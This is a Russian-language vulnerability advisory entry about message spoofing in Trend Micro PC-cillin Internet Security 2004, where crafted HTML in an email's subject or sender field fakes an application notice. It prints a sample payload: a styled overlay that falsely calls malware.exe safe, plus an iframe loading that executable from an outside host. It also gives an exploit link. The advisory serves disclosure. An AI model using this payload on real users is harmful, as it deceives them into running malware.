Подмена сообщения в Trend Micro PC-cillin Internet Security
| Дата публикации: | 09.06.2004 |
| Дата изменения: | 16.10.2006 |
| Всего просмотров: | 894 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Trend Micro PC-cillin Internet Security 2004
Описание: Уязвимость обнаружена в Trend Micro PC-cillin Internet Security. Удаленный пользователь может послать e-mail, чтобы подменить сообщения от приложения и потенциально выполнить произвольный код. Удаленный пользователь может послать специально сформированное HMTL в полях subject или sender, чтобы отобразить сообщение, которое будет выглядеть как правильное сообщение, сгенерированное приложением. Пример: style="position:absolute;top:25;left:10;height:300pt;width:300pt; z-index:+100;font-family:Verdana;font-weight: bold;font-size: 12pt;font-color:green">Trend Micro Internet Security confirms this file <br>malware.exe is safe to open. Proceed.</div><iframe src="http://www.malware.com/malware.exe"> Пример/Эксплоит: http://www.malware.com/micronot.png URL производителя:http://www.trendmicro.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | TREND MICRO: The Protector Becomes The Vector Take II |
